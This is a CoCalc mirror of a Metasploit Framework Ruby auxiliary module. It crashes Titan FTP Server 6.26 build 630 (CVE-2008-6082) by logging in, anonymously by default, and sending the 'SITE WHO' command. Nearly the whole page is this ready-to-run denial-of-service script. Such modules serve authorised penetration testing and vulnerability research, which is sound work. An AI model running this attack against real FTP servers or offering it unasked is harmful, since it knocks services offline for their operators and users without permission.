CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ftp/titan626_site.rb
Views: 1904
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Ftp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(update_info(info,
12
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
13
'Description' => %q{
14
The Titan FTP server v6.26 build 630 can be DoS'd by
15
issuing "SITE WHO". You need a valid login so you
16
can send this command.
17
},
18
'Author' => 'kris katterjohn',
19
'License' => MSF_LICENSE,
20
'References' =>
21
[
22
[ 'CVE', '2008-6082'],
23
[ 'OSVDB', '49177'],
24
[ 'EDB', '6753']
25
],
26
'DisclosureDate' => '2008-10-14'))
27
28
# They're required
29
register_options([
30
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
31
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
32
])
33
end
34
35
def run
36
return unless connect_login
37
print_status("Sending command...")
38
raw_send("SITE WHO\r\n")
39
select(nil,nil,nil,1)
40
disconnect
41
end
42
end
43
44